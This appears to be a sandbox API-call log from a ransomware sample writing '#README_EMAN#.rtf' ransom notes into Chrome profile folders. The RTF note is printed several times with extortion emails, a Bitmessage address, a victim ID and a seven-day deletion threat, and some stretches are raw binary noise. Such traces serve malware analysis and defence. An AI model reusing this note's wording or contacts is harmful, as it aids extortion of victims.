vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.671] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.677] CloseHandle (hObject=0x27c) returned 1 [0301.677] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\#readme_eman#.rtf")) returned 0x20 [0301.677] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\#readme_eman#.rtf")) returned 0x20 [0301.677] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\#readme_eman#.rtf")) returned 0x20 [0301.677] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#readme_eman#.rtf")) returned 0x20 [0301.677] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\#readme_eman#.rtf")) returned 0xffffffff [0301.677] GetLastError () returned 0x2 [0301.677] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\index-dir\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.684] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.684] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.684] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 